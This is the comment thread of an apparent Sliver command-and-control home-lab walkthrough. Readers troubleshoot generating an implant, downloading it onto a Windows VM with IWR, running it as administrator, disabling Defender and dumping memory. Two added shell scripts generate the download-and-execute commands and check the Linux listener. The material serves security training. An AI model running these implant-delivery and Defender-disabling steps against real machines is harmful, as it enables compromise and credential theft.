84 Comments

Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.

Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!

Hello Eric, I cannot SSH into my Linux VM from my host machine. Is that a problem that I should be concerned with?

Apr 11, 2023·edited Apr 11, 2023

I am getting "cd: /opt/sliver: not a directory" for some reason.

Part 2, Step 7 gives me this error:

PS C:\Windows\system32> IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe
Invoke-WebRequest : Cannot bind parameter 'Uri'. Cannot convert value "http://[Linux_VM_IP]/[payload_name].exe" to
type "System.Uri". Error: "Invalid URI: The hostname could not be parsed."
At line:1 char:10
+ IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\Us ...
+          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Invoke-WebRequest], ParameterBindingException
    + FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Fun stuff! I know this is old news now, but I have had two issues so far.

First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.

Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload (love saying that) nothing happens. No joy.

I will attempt to start from the beginning and try again later today. Thanks!

Hi Eric, when trying to run the C2 executable in PowerShell I keep getting the error "Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1". Any idea how to troubleshoot? Do you think it might be Defender, or because I downloaded the latest version of Microsoft and perhaps they patched the payload, hmmm... I'll try to figure it out in the meantime.

Hi Eric, this has been a fun project so far, thanks!

I am not able to run the netstat cmd inside sliver and can't figure out why.

So far, every other cmd works as intended; when I run netstat it just hangs forever with no data. I have to use Ctrl+C to back out.

I am connected to the active session with the use [session ID] cmd

pwd shows C:/windows/system32

I can run netstat from the windows vm command line and get results, ping and dns are both working for internal and external connections

getprivs cmd shows the correct process attributes as enabled (exploit was run as admin).

I'm blanking here, any help is appreciated.

Thanks!

Hi Eric, thanks for this walkthrough.

I am trying to set up or generate the C2 payload as you described (generate --http 192.168.42.128 --save /opt/sliver) for my Ubuntu server via PuTTY (SSH), but I get the error "error:unknown command, try help".

I have tried sudo, but nothing is successful.

Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up as enabled. The first time I did it, it showed up enabled. The next day it said disabled, so I regenerated the implant and it was enabled. I then ran into errors dumping memory, so I tried to use a new implant, and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever run into this?

Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.

Hello Eric, I am stuck at the generate a C2 payload using sliver. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.

It says "command not found" sometimes, and sometimes it just shows random GitHub directory lines. Do help.

No doubt missed something, but I've been working back through the steps and cannot find the cause. 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. Continue to get the following:

PS C:\Windows\system32> IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile C:\Users\User\Downloads\Unusual_Heron.exe
IWR : Unable to connect to the remote server
At line:1 char:1
+ IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Any initial thoughts what I might be overlooking?

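
The two IWR failures quoted in the comments above (the "Invalid URI: The hostname could not be parsed" one and the "Unable to connect to the remote server" one) come from the same step, so here is a small helper that builds the download URL and the PowerShell lines from the Linux VM IP and the implant name. It is an added example, not code from the original post or from Sliver. It assumes what the walkthrough's comments show: the implant is served with python3 -m http.server 80 started from inside /opt/sliver (so that directory is the web root and must not appear in the URL), and the Windows download path is C:\Users\User\Downloads.

```shell
#!/bin/sh
# Added example, not code from the original post or from Sliver. Builds the
# download URL and the PowerShell lines for the Windows VM and rejects the two
# mistakes visible in the IWR errors above: an un-replaced [Linux_VM_IP]
# placeholder ("Invalid URI: The hostname could not be parsed") and /opt/sliver
# left in the URL path.
# Assumption: `python3 -m http.server 80` is started from inside /opt/sliver,
# so that directory is the web root and the URL path is just the file name.
set -u

# True if $1 is a dotted quad with every octet in 0..255 (plain sh, no regex).
is_ipv4() {
  ip=$1
  old_ifs=$IFS; IFS=.; set -f      # split on "." only, no globbing of "*"
  set -- $ip
  set +f; IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case $octet in ''|*[!0-9]*) return 1 ;; esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# payload_url <linux_vm_ip> <implant path or name>
# Prints http://<ip>/<NAME>.exe. Any directory part (e.g. /opt/sliver/) is
# stripped: the web root already is /opt/sliver, so a URL containing it would
# answer 404 even once the TCP connection succeeds.
payload_url() {
  ip=$1
  name=${2##*/}
  name=${name%.exe}
  if ! is_ipv4 "$ip"; then
    printf 'error: "%s" is not an IPv4 address; replace the placeholder with the Linux VM IP\n' "$ip" >&2
    return 1
  fi
  printf 'http://%s/%s.exe\n' "$ip" "$name"
}

# windows_commands <linux_vm_ip> <implant path or name>
# Prints the three lines to paste into the administrative PowerShell prompt.
windows_commands() {
  url=$(payload_url "$1" "$2") || return 1
  name=${2##*/}; name=${name%.exe}
  dest="C:\\Users\\User\\Downloads\\$name.exe"
  printf 'IWR -Uri %s -OutFile "%s"\n' "$url" "$dest"
  # "... is not recognized as the name of a cmdlet ..." means the path did not
  # resolve to a file; confirm the download actually landed (Defender may have
  # removed it) before trying to run it.
  printf 'Test-Path "%s"\n' "$dest"
  printf '& "%s"\n' "$dest"
}

# "Unable to connect to the remote server" is a TCP-level failure, not a bad
# path: nothing is listening on tcp/80 on the Linux side, or the two VMs are
# not on the same network. From the Windows VM: Test-NetConnection <ip> -Port 80
```

Usage: `sh lab_url.sh` after sourcing, e.g. `windows_commands 192.168.44.128 /opt/sliver/UNUSUAL_HERON.exe` prints the IWR line with `http://192.168.44.128/UNUSUAL_HERON.exe`, a Test-Path check, and the `& "..."` invocation to paste into PowerShell.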
Got it! Thanks. I've been experiencing my VMs running super slow. So I did some testing, and I'm using about 90% of the 16 GB of RAM that I have on my laptop, lol. I might have to upgrade, or maybe I can get my hands on a Windows PC or laptop.

Hey, I'm on part two, running the web server ("cd /opt/sliver python3 -m http.server 80"), and it's saying "cd: too many arguments". Any ideas on how to get around this?

Apr 1, 2023·edited Apr 1, 2023

Hi Eric, I am having an error at the sliver server part. When I type the "generate --http IP --save/opt/sliver" command, I get the following error: "rpc error code: = unknown desc = exit status 1". Any idea what might be wrong here?

On "Start Command and Control Session" step 1c where we type "http" I keep getting errors:

[server] sliver > http
[*] Starting HTTP :80 listener ...
[*] Successfully started job #1
[!] Job #1 stopped (tcp/http)
[!] Job #1 stopped (tcp/http)

I get this over and over again when typing "http"

Any ideas?

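
Three of the Linux-side problems in this thread ("cd: /opt/sliver: not a directory", "cd: too many arguments", and the http job that stops straight after "Successfully started job") can be checked from the Linux VM before touching the Windows side. The script below is an added example, not code from the original post or from Sliver. Its assumptions: that `generate --http <IP> --save /opt/sliver` writes the implant into /opt/sliver only when that path already exists as a directory and otherwise writes the implant as a file of that name (which is what turns the later `cd` into "not a directory"); that the python3 http.server and Sliver's `http` listener both bind tcp/80, so whichever starts second fails and the Sliver job stops immediately; and that `ss -ltnp` output has the column layout shown in the sample, which is constructed for the example. Note also that generate, http and use are Sliver console commands (run sliver-server first); typed at the bash prompt they only produce "command not found".

```shell
#!/bin/sh
# Added example, not code from the original post or from Sliver: pre-flight
# checks for the Linux VM in the lab described in the comments above.
set -u

# save_dir_state <path>  -> prints dir | file | missing
# Assumption about `generate ... --save /opt/sliver`: the implant lands INSIDE
# /opt/sliver only when that directory already exists; otherwise the implant
# itself is written as a file named /opt/sliver, and a later `cd /opt/sliver`
# reports "not a directory". Fix: sudo mkdir -p /opt/sliver, then regenerate.
save_dir_state() {
  if [ -d "$1" ]; then echo dir
  elif [ -e "$1" ]; then echo file
  else echo missing
  fi
}

# serve_payloads_cmd <dir> <port>
# "cd /opt/sliver python3 -m http.server 80" on one line hands the extra words
# to cd ("too many arguments"); the two commands must be joined with && (or
# typed on separate lines).
serve_payloads_cmd() {
  printf 'cd %s && python3 -m http.server %s\n' "$1" "$2"
}

# listener_on_port <port>   (reads the output of `ss -ltnp` on stdin)
# Prints "<process> pid=<n>" and returns 0 if something already listens on the
# port, 1 otherwise. python3 -m http.server 80 and Sliver's `http` listener
# both want tcp/80; whichever starts second cannot bind, which in the Sliver
# console shows up as the job stopping right after it started. Stop the Python
# server with Ctrl-C (the implant is already on the Windows VM) before `http`.
listener_on_port() {
  want=$1
  while read -r state recvq sendq laddr raddr proc; do
    [ "$state" = LISTEN ] || continue
    [ "${laddr##*:}" = "$want" ] || continue   # 0.0.0.0:80, [::]:80, *:80
    case $proc in
      *pid=*)                                   # users:(("python3",pid=4242,fd=3))
        name=${proc#*\"}; name=${name%%\"*}
        pid=${proc#*pid=};  pid=${pid%%,*}
        printf '%s pid=%s\n' "$name" "$pid" ;;
      *) printf 'unknown process (run ss as root to see it)\n' ;;
    esac
    return 0
  done
  return 1
}

# Live check on the Linux VM (not executed here):
#   ss -ltnp | listener_on_port 80 && echo "port 80 is taken; stop that first"
```

The parser deliberately reads `ss` output from stdin rather than calling `ss` itself, so it can be exercised on a captured listing and still be piped from the real command on the VM.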